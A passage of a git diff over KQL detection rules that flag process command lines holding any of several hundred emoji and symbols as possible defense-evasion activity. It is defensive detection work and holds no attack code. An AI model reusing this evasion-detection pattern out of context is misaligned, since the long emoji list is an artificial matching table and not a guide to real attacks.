"🚸" or ProcessCommandLine contains "🔱" or ProcessCommandLine contains "⚜️" or ProcessCommandLine contains "🔰" or ProcessCommandLine contains "♻️" or ProcessCommandLine contains "✅" or ProcessCommandLine contains "🈯️" or ProcessCommandLine contains "💹" or ProcessCommandLine contains "❇️" or ProcessCommandLine contains "✳️" or ProcessCommandLine contains "❎" or ProcessCommandLine contains "🌐" or ProcessCommandLine contains "💠" or ProcessCommandLine contains "Ⓜ️" or ProcessCommandLine contains "🌀" or ProcessCommandLine contains "💤" or ProcessCommandLine contains "🏧" or ProcessCommandLine contains "🚾" or ProcessCommandLine contains "♿️" or ProcessCommandLine contains "🅿️" or ProcessCommandLine contains "🛗" or ProcessCommandLine contains "🈳" or ProcessCommandLine contains "🈂️" or ProcessCommandLine contains "🛂" or ProcessCommandLine contains "🛃" or ProcessCommandLine contains "🛄" or ProcessCommandLine contains "🛅" or ProcessCommandLine contains "🚹" or ProcessCommandLine contains "🚺" or ProcessCommandLine contains "🚼" or ProcessCommandLine contains "⚧" or ProcessCommandLine contains "🚻" or ProcessCommandLine contains "🚮" or ProcessCommandLine contains "🎦" or ProcessCommandLine contains "📶" or ProcessCommandLine contains "🈁" or ProcessCommandLine contains "🔣" or ProcessCommandLine contains "ℹ️" or ProcessCommandLine contains "🔤" or ProcessCommandLine contains "🔡" or ProcessCommandLine contains "🔠" or ProcessCommandLine contains "🆖" or ProcessCommandLine contains "🆗" or ProcessCommandLine contains "🆙" or ProcessCommandLine contains "🆒" or ProcessCommandLine contains "🆕" or ProcessCommandLine contains "🆓" or ProcessCommandLine contains "0️⃣" or ProcessCommandLine contains "1️⃣" or ProcessCommandLine contains "2️⃣" or ProcessCommandLine contains "3️⃣" or ProcessCommandLine contains "4️⃣" or ProcessCommandLine contains "5️⃣" or ProcessCommandLine contains "6️⃣" or ProcessCommandLine contains "7️⃣" or ProcessCommandLine contains "8️⃣" or ProcessCommandLine contains "9️⃣" or ProcessCommandLine contains "🔟" or ProcessCommandLine contains "🔢" or ProcessCommandLine contains "#️⃣" or ProcessCommandLine contains "️⃣" or ProcessCommandLine contains "⏏️" or ProcessCommandLine contains "▶️" or ProcessCommandLine contains "⏸" or ProcessCommandLine contains "⏯" or ProcessCommandLine contains "⏹" or ProcessCommandLine contains "⏺" or ProcessCommandLine contains "⏭" or ProcessCommandLine contains "⏮" or ProcessCommandLine contains "⏩" or ProcessCommandLine contains "⏪" or ProcessCommandLine contains "⏫" or ProcessCommandLine contains "⏬" or ProcessCommandLine contains "◀️" or ProcessCommandLine contains "🔼" or ProcessCommandLine contains "🔽" or ProcessCommandLine contains "➡️" or ProcessCommandLine contains "⬅️" or ProcessCommandLine contains "⬆️" or ProcessCommandLine contains "⬇️" or ProcessCommandLine contains "↗️" or ProcessCommandLine contains "↘️" or ProcessCommandLine contains "↙️" or ProcessCommandLine contains "↖️" or ProcessCommandLine contains "↕️" or ProcessCommandLine contains "↔️" or ProcessCommandLine contains "↪️" or ProcessCommandLine contains "↩️" or ProcessCommandLine contains "⤴️" or ProcessCommandLine contains "⤵️" or ProcessCommandLine contains "🔀" or ProcessCommandLine contains "🔁" or ProcessCommandLine contains "🔂" or ProcessCommandLine contains "🔄" or ProcessCommandLine contains "🔃" or ProcessCommandLine contains "🎵" or ProcessCommandLine contains "🎶" or ProcessCommandLine contains "➕" or ProcessCommandLine contains "➖" or ProcessCommandLine contains "➗" or ProcessCommandLine contains "✖️" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "♾" or ProcessCommandLine contains "💲" or ProcessCommandLine contains "💱" or ProcessCommandLine contains "™️" or ProcessCommandLine contains "©️" or ProcessCommandLine contains "®️" or ProcessCommandLine contains "〰️" or ProcessCommandLine contains "➰" or ProcessCommandLine contains "➿" or ProcessCommandLine contains "🔚" or ProcessCommandLine contains "🔙" or ProcessCommandLine contains "🔛" or ProcessCommandLine contains "🔝" or ProcessCommandLine contains "🔜" or ProcessCommandLine contains "✔️" or ProcessCommandLine contains "☑️" or ProcessCommandLine contains "🔘" or ProcessCommandLine contains "🔴" or ProcessCommandLine contains "🟠" or ProcessCommandLine contains "🟡" or ProcessCommandLine contains "🟢" or ProcessCommandLine contains "🔵" or ProcessCommandLine contains "🟣" or ProcessCommandLine contains "⚫️" or ProcessCommandLine contains "⚪️" or ProcessCommandLine contains "🟤" or ProcessCommandLine contains "🔺" or ProcessCommandLine contains "🔻" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql index b8cabf92..135b12e1 100644 --- a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql @@ -1,10 +1,10 @@ -// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 -// Author: @Kostastsale, TheDFIRReport -// Date: 2022-12-05 -// Level: high -// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where ProcessCommandLine contains "🔸" or ProcessCommandLine contains "🔹" or ProcessCommandLine contains "🔶" or ProcessCommandLine contains "🔷" or ProcessCommandLine contains "🔳" or ProcessCommandLine contains "🔲" or ProcessCommandLine contains "▪️" or ProcessCommandLine contains "▫️" or ProcessCommandLine contains "◾️" or ProcessCommandLine contains "◽️" or ProcessCommandLine contains "◼️" or ProcessCommandLine contains "◻️" or ProcessCommandLine contains "🟥" or ProcessCommandLine contains "🟧" or ProcessCommandLine contains "🟨" or ProcessCommandLine contains "🟩" or ProcessCommandLine contains "🟦" or ProcessCommandLine contains "🟪" or ProcessCommandLine contains "⬛️" or ProcessCommandLine contains "⬜️" or ProcessCommandLine contains "🟫" or ProcessCommandLine contains "🔈" or ProcessCommandLine contains "🔇" or ProcessCommandLine contains "🔉" or ProcessCommandLine contains "🔊" or ProcessCommandLine contains "🔔" or ProcessCommandLine contains "🔕" or ProcessCommandLine contains "📣" or ProcessCommandLine contains "📢" or ProcessCommandLine contains "👁‍🗨" or ProcessCommandLine contains "💬" or ProcessCommandLine contains "💭" or ProcessCommandLine contains "🗯" or ProcessCommandLine contains "♠️" or ProcessCommandLine contains "♣️" or ProcessCommandLine contains "♥️" or ProcessCommandLine contains "♦️" or ProcessCommandLine contains "🃏" or ProcessCommandLine contains "🎴" or ProcessCommandLine contains "🀄️" or ProcessCommandLine contains "🕐" or ProcessCommandLine contains "🕑" or ProcessCommandLine contains "🕒" or ProcessCommandLine contains "🕓" or ProcessCommandLine contains "🕔" or ProcessCommandLine contains "🕕" or ProcessCommandLine contains "🕖" or ProcessCommandLine contains "🕗" or ProcessCommandLine contains "🕘" or ProcessCommandLine contains "🕙" or ProcessCommandLine contains "🕚" or ProcessCommandLine contains "🕛" or ProcessCommandLine contains "🕜" or ProcessCommandLine contains "🕝" or ProcessCommandLine contains "🕞" or ProcessCommandLine contains "🕟" or ProcessCommandLine contains "🕠" or ProcessCommandLine contains "🕡" or ProcessCommandLine contains "🕢" or ProcessCommandLine contains "🕣" or ProcessCommandLine contains "🕤" or ProcessCommandLine contains "🕥" or ProcessCommandLine contains "🕦" or ProcessCommandLine contains "🕧✢" or ProcessCommandLine contains "✣" or ProcessCommandLine contains "✤" or ProcessCommandLine contains "✥" or ProcessCommandLine contains "✦" or ProcessCommandLine contains "✧" or ProcessCommandLine contains "★" or ProcessCommandLine contains "☆" or ProcessCommandLine contains "✯" or ProcessCommandLine contains "✡︎" or ProcessCommandLine contains "✩" or ProcessCommandLine contains "✪" or ProcessCommandLine contains "✫" or ProcessCommandLine contains "✬" or ProcessCommandLine contains "✭" or ProcessCommandLine contains "✮" or ProcessCommandLine contains "✶" or ProcessCommandLine contains "✷" or ProcessCommandLine contains "✵" or ProcessCommandLine contains "✸" or ProcessCommandLine contains "✹" or ProcessCommandLine contains "→" or ProcessCommandLine contains "⇒" or ProcessCommandLine contains "⟹" or ProcessCommandLine contains "⇨" or ProcessCommandLine contains "⇾" or ProcessCommandLine contains "➾" or ProcessCommandLine contains "⇢" or ProcessCommandLine contains "☛" or ProcessCommandLine contains "☞" or ProcessCommandLine contains "➔" or ProcessCommandLine contains "➜" or ProcessCommandLine contains "➙" or ProcessCommandLine contains "➛" or ProcessCommandLine contains "➝" or ProcessCommandLine contains "➞" or ProcessCommandLine contains "♠︎" or ProcessCommandLine contains "♣︎" or ProcessCommandLine contains "♥︎" or ProcessCommandLine contains "♦︎" or ProcessCommandLine contains "♤" or ProcessCommandLine contains "♧" or ProcessCommandLine contains "♡" or ProcessCommandLine contains "♢" or ProcessCommandLine contains "♚" or ProcessCommandLine contains "♛" or ProcessCommandLine contains "♜" or ProcessCommandLine contains "♝" or ProcessCommandLine contains "♞" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "♔" or ProcessCommandLine contains "♕" or ProcessCommandLine contains "♖" or ProcessCommandLine contains "♗" or ProcessCommandLine contains "♘" or ProcessCommandLine contains "♙" or ProcessCommandLine contains "⚀" or ProcessCommandLine contains "⚁" or ProcessCommandLine contains "⚂" or ProcessCommandLine contains "⚃" or ProcessCommandLine contains "⚄" or ProcessCommandLine contains "⚅" or ProcessCommandLine contains "🂠" or ProcessCommandLine contains "⚈" or ProcessCommandLine contains "⚉" or ProcessCommandLine contains "⚆" or ProcessCommandLine contains "⚇" or ProcessCommandLine contains "𓀀" or ProcessCommandLine contains "𓀁" or ProcessCommandLine contains "𓀂" or ProcessCommandLine contains "𓀃" or ProcessCommandLine contains "𓀄" or ProcessCommandLine contains "𓀅" or ProcessCommandLine contains "𓀆" or ProcessCommandLine contains "𓀇" or ProcessCommandLine contains "𓀈" or ProcessCommandLine contains "𓀉" or ProcessCommandLine contains "𓀊" or ProcessCommandLine contains "𓀋" or ProcessCommandLine contains "𓀌" or ProcessCommandLine contains "𓀍" or ProcessCommandLine contains "𓀎" or ProcessCommandLine contains "𓀏" or ProcessCommandLine contains "𓀐" or ProcessCommandLine contains "𓀑" or ProcessCommandLine contains "𓀒" or ProcessCommandLine contains "𓀓" or ProcessCommandLine contains "𓀔" or ProcessCommandLine contains "𓀕" or ProcessCommandLine contains "𓀖" or ProcessCommandLine contains "𓀗" or ProcessCommandLine contains "𓀘" or ProcessCommandLine contains "𓀙" or ProcessCommandLine contains "𓀚" or ProcessCommandLine contains "𓀛" or ProcessCommandLine contains "𓀜" or ProcessCommandLine contains "𓀝🏳️" or ProcessCommandLine contains "🏴" or ProcessCommandLine contains "🏁" or ProcessCommandLine contains "🚩" or ProcessCommandLine contains "🏳️‍🌈" or ProcessCommandLine contains "🏳️‍⚧️" or ProcessCommandLine contains "🏴‍☠️" or ProcessCommandLine contains "🇦🇫" or ProcessCommandLine contains "🇦🇽" or ProcessCommandLine contains "🇦🇱" or ProcessCommandLine contains "🇩🇿" or ProcessCommandLine contains "🇦🇸" or ProcessCommandLine contains "🇦🇩" or ProcessCommandLine contains "🇦🇴" or ProcessCommandLine contains "🇦🇮" or ProcessCommandLine contains "🇦🇶" or ProcessCommandLine contains "🇦🇬" or ProcessCommandLine contains "🇦🇷" or ProcessCommandLine contains "🇦🇲" or ProcessCommandLine contains "🇦🇼" or ProcessCommandLine contains "🇦🇺" or ProcessCommandLine contains "🇦🇹" or ProcessCommandLine contains "🇦🇿" or ProcessCommandLine contains "🇧🇸" or ProcessCommandLine contains "🇧🇭" or ProcessCommandLine contains "🇧🇩" or ProcessCommandLine contains "🇧🇧" or ProcessCommandLine contains "🇧🇾" or ProcessCommandLine contains "🇧🇪" or ProcessCommandLine contains "🇧🇿" or ProcessCommandLine contains "🇧🇯" or ProcessCommandLine contains "🇧🇲" or ProcessCommandLine contains "🇧🇹" or ProcessCommandLine contains "🇧🇴" or ProcessCommandLine contains "🇧🇦" or ProcessCommandLine contains "🇧🇼" or ProcessCommandLine contains "🇧🇷" or ProcessCommandLine contains "🇮🇴" or ProcessCommandLine contains "🇻🇬" or ProcessCommandLine contains "🇧🇳" or ProcessCommandLine contains "🇧🇬" or ProcessCommandLine contains "🇧🇫" or ProcessCommandLine contains "🇧🇮" or ProcessCommandLine contains "🇰🇭" or ProcessCommandLine contains "🇨🇲" or ProcessCommandLine contains "🇨🇦" or ProcessCommandLine contains "🇮🇨" or ProcessCommandLine contains "🇨🇻" or ProcessCommandLine contains "🇧🇶" or ProcessCommandLine contains "🇰🇾" or ProcessCommandLine contains "🇨🇫" or ProcessCommandLine contains "🇹🇩" or ProcessCommandLine contains "🇨🇱" or ProcessCommandLine contains "🇨🇳" or ProcessCommandLine contains "🇨🇽" or ProcessCommandLine contains "🇨🇨" or ProcessCommandLine contains "🇨🇴" or ProcessCommandLine contains "🇰🇲" or ProcessCommandLine contains "🇨🇬" or ProcessCommandLine contains "🇨🇩" or ProcessCommandLine contains "🇨🇰" or ProcessCommandLine contains "🇨🇷" or ProcessCommandLine contains "🇨🇮" or ProcessCommandLine contains "🇭🇷" or ProcessCommandLine contains "🇨🇺" or ProcessCommandLine contains "🇨🇼" or ProcessCommandLine contains "🇨🇾" or ProcessCommandLine contains "🇨🇿" or ProcessCommandLine contains "🇩🇰" or ProcessCommandLine contains "🇩🇯" or ProcessCommandLine contains "🇩🇲" or ProcessCommandLine contains "🇩🇴" or ProcessCommandLine contains "🇪🇨" or ProcessCommandLine contains "🇪🇬" or ProcessCommandLine contains "🇸🇻" or ProcessCommandLine contains "🇬🇶" or ProcessCommandLine contains "🇪🇷" or ProcessCommandLine contains "🇪🇪" or ProcessCommandLine contains "🇪🇹" or ProcessCommandLine contains "🇪🇺" or ProcessCommandLine contains "🇫🇰" or ProcessCommandLine contains "🇫🇴" or ProcessCommandLine contains "🇫🇯" or ProcessCommandLine contains "🇫🇮" or ProcessCommandLine contains "🇫🇷" or ProcessCommandLine contains "🇬🇫" or ProcessCommandLine contains "🇵🇫" or ProcessCommandLine contains "🇹🇫" or ProcessCommandLine contains "🇬🇦" or ProcessCommandLine contains "🇬🇲" or ProcessCommandLine contains "🇬🇪" or ProcessCommandLine contains "🇩🇪" or ProcessCommandLine contains "🇬🇭" or ProcessCommandLine contains "🇬🇮" or ProcessCommandLine contains "🇬🇷" or ProcessCommandLine contains "🇬🇱" or ProcessCommandLine contains "🇬🇩" or ProcessCommandLine contains "🇬🇵" or ProcessCommandLine contains "🇬🇺" or ProcessCommandLine contains "🇬🇹" or ProcessCommandLine contains "🇬🇬" or ProcessCommandLine contains "🇬🇳" or ProcessCommandLine contains "🇬🇼" or ProcessCommandLine contains "🇬🇾" or ProcessCommandLine contains "🇭🇹" or ProcessCommandLine contains "🇭🇳" or ProcessCommandLine contains "🇭🇰" or ProcessCommandLine contains "🇭🇺" or ProcessCommandLine contains "🇮🇸" or ProcessCommandLine contains "🇮🇳" or ProcessCommandLine contains "🇮🇩" or ProcessCommandLine contains "🇮🇷" or ProcessCommandLine contains "🇮🇶" or ProcessCommandLine contains "🇮🇪" or ProcessCommandLine contains "🇮🇲" or ProcessCommandLine contains "🇮🇱" or ProcessCommandLine contains "🇮🇹" or ProcessCommandLine contains "🇯🇲" or ProcessCommandLine contains "🇯🇵" or ProcessCommandLine contains "🎌" or ProcessCommandLine contains "🇯🇪" or ProcessCommandLine contains "🇯🇴" or ProcessCommandLine contains "🇰🇿" or ProcessCommandLine contains "🇰🇪" or ProcessCommandLine contains "🇰🇮" or ProcessCommandLine contains "🇽🇰" or ProcessCommandLine contains "🇰🇼" or ProcessCommandLine contains "🇰🇬" or ProcessCommandLine contains "🇱🇦" or ProcessCommandLine contains "🇱🇻" or ProcessCommandLine contains "🇱🇧" or ProcessCommandLine contains "🇱🇸" or ProcessCommandLine contains "🇱🇷" or ProcessCommandLine contains "🇱🇾" or ProcessCommandLine contains "🇱🇮" or ProcessCommandLine contains "🇱🇹" or ProcessCommandLine contains "🇱🇺" or ProcessCommandLine contains "🇲🇴" or ProcessCommandLine contains "🇲🇰" or ProcessCommandLine contains "🇲🇬" or ProcessCommandLine contains "🇲🇼" or ProcessCommandLine contains "🇲🇾" or ProcessCommandLine contains "🇲🇻" or ProcessCommandLine contains "🇲🇱" or ProcessCommandLine contains "🇲🇹" or ProcessCommandLine contains "🇲🇭" or ProcessCommandLine contains "🇲🇶" or ProcessCommandLine contains "🇲🇷" or ProcessCommandLine contains "🇲🇺" or ProcessCommandLine contains "🇾🇹" or ProcessCommandLine contains "🇲🇽" or ProcessCommandLine contains "🇫🇲" or ProcessCommandLine contains "🇲🇩" or ProcessCommandLine contains "🇲🇨" or ProcessCommandLine contains "🇲🇳" or ProcessCommandLine contains "🇲🇪" or ProcessCommandLine contains "🇲🇸" or ProcessCommandLine contains "🇲🇦" or ProcessCommandLine contains "🇲🇿" or ProcessCommandLine contains "🇲🇲" or ProcessCommandLine contains "🇳🇦" or ProcessCommandLine contains "🇳🇷" or ProcessCommandLine contains "🇳🇵" or ProcessCommandLine contains "🇳🇱" or ProcessCommandLine contains "🇳🇨" or ProcessCommandLine contains "🇳🇿" or ProcessCommandLine contains "🇳🇮" or ProcessCommandLine contains "🇳🇪" or ProcessCommandLine contains "🇳🇬" or ProcessCommandLine contains "🇳🇺" or ProcessCommandLine contains "🇳🇫" or ProcessCommandLine contains "🇰🇵" or ProcessCommandLine contains "🇲🇵" or ProcessCommandLine contains "🇳🇴" or ProcessCommandLine contains "🇴🇲" or ProcessCommandLine contains "🇵🇰" or ProcessCommandLine contains "🇵🇼" or ProcessCommandLine contains "🇵🇸" or ProcessCommandLine contains "🇵🇦" or ProcessCommandLine contains "🇵🇬" or ProcessCommandLine contains "🇵🇾" or ProcessCommandLine contains "🇵🇪" or ProcessCommandLine contains "🇵🇭" or ProcessCommandLine contains "🇵🇳" or ProcessCommandLine contains "🇵🇱" or ProcessCommandLine contains "🇵🇹" or ProcessCommandLine contains "🇵🇷" or ProcessCommandLine contains "🇶🇦" or ProcessCommandLine contains "🇷🇪" or ProcessCommandLine contains "🇷🇴" or ProcessCommandLine contains "🇷🇺" or ProcessCommandLine contains "🇷🇼" or ProcessCommandLine contains "🇼🇸" or ProcessCommandLine contains "🇸🇲" or ProcessCommandLine contains "🇸🇦" or ProcessCommandLine contains "🇸🇳" or ProcessCommandLine contains "🇷🇸" or ProcessCommandLine contains "🇸🇨" or ProcessCommandLine contains "🇸🇱" or ProcessCommandLine contains "🇸🇬" or ProcessCommandLine contains "🇸🇽" or ProcessCommandLine contains "🇸🇰" or ProcessCommandLine contains "🇸🇮" or ProcessCommandLine contains "🇬🇸" or ProcessCommandLine contains "🇸🇧" or ProcessCommandLine contains "🇸🇴" or ProcessCommandLine contains "🇿🇦" or ProcessCommandLine contains "🇰🇷" or ProcessCommandLine contains "🇸🇸" or ProcessCommandLine contains "🇪🇸" or ProcessCommandLine contains "🇱🇰" or ProcessCommandLine contains "🇧🇱" or ProcessCommandLine contains "🇸🇭" or ProcessCommandLine contains "🇰🇳" or ProcessCommandLine contains "🇱🇨" or ProcessCommandLine contains "🇵🇲" or ProcessCommandLine contains "🇻🇨" or ProcessCommandLine contains "🇸🇩" or ProcessCommandLine contains "🇸🇷" or ProcessCommandLine contains "🇸🇿" or ProcessCommandLine contains "🇸🇪" or ProcessCommandLine contains "🇨🇭" or ProcessCommandLine contains "🇸🇾" or ProcessCommandLine contains "🇹🇼" or ProcessCommandLine contains "🇹🇯" or ProcessCommandLine contains "🇹🇿" or ProcessCommandLine contains "🇹🇭" or ProcessCommandLine contains "🇹🇱" or ProcessCommandLine contains "🇹🇬" or ProcessCommandLine contains "🇹🇰" or ProcessCommandLine contains "🇹🇴" or ProcessCommandLine contains "🇹🇹" or ProcessCommandLine contains "🇹🇳" or ProcessCommandLine contains "🇹🇷" or ProcessCommandLine contains "🇹🇲" or ProcessCommandLine contains "🇹🇨" or ProcessCommandLine contains "🇹🇻" or ProcessCommandLine contains "🇻🇮" or ProcessCommandLine contains "🇺🇬" or ProcessCommandLine contains "🇺🇦" or ProcessCommandLine contains "🇦🇪" or ProcessCommandLine contains "🇬🇧" or ProcessCommandLine contains "🏴󠁧󠁢󠁥󠁮󠁧󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁳󠁣󠁴󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁷󠁬󠁳󠁿" or ProcessCommandLine contains "🇺🇳" or ProcessCommandLine contains "🇺🇸" or ProcessCommandLine contains "🇺🇾" or ProcessCommandLine contains "🇺🇿" or ProcessCommandLine contains "🇻🇺" or ProcessCommandLine contains "🇻🇦" or ProcessCommandLine contains "🇻🇪" or ProcessCommandLine contains "🇻🇳" or ProcessCommandLine contains "🇼🇫" or ProcessCommandLine contains "🇪🇭" or ProcessCommandLine contains "🇾🇪" or ProcessCommandLine contains "🇿🇲" or ProcessCommandLine contains "🇿🇼🫠" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🫤" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🤝🏻" or ProcessCommandLine contains "🤝🏼" or ProcessCommandLine contains "🤝🏽" or ProcessCommandLine contains "🤝🏾" or ProcessCommandLine contains "🤝🏿" or ProcessCommandLine contains "🫱🏻‍🫲🏼" or ProcessCommandLine contains "🫱🏻‍🫲🏽" or ProcessCommandLine contains "🫱🏻‍🫲🏾" or ProcessCommandLine contains "🫱🏻‍🫲🏿" or ProcessCommandLine contains "🫱🏼‍🫲🏻" or ProcessCommandLine contains "🫱🏼‍🫲🏽" or ProcessCommandLine contains "🫱🏼‍🫲🏾" or ProcessCommandLine contains "🫱🏼‍🫲🏿" or ProcessCommandLine contains "🫱🏽‍🫲🏻" or ProcessCommandLine contains "🫱🏽‍🫲🏼" or ProcessCommandLine contains "🫱🏽‍🫲🏾" or ProcessCommandLine contains "🫱🏽‍🫲🏿" or ProcessCommandLine contains "🫱🏾‍🫲🏻" or ProcessCommandLine contains "🫱🏾‍🫲🏼" or ProcessCommandLine contains "🫱🏾‍🫲🏽" or ProcessCommandLine contains "🫱🏾‍🫲🏿" or ProcessCommandLine contains "🫱🏿‍🫲🏻" or ProcessCommandLine contains "🫱🏿‍🫲🏼" or ProcessCommandLine contains "🫱🏿‍🫲🏽" or ProcessCommandLine contains "🫱🏿‍🫲🏾" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "💑🏻" or ProcessCommandLine contains "💑🏼" or ProcessCommandLine contains "💑🏽" or ProcessCommandLine contains "💑🏾" or ProcessCommandLine contains "💑🏿" or ProcessCommandLine contains "💏🏻" or ProcessCommandLine contains "💏🏼" or ProcessCommandLine contains "💏🏽" or ProcessCommandLine contains "💏🏾" or ProcessCommandLine contains "💏🏿" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏻" or 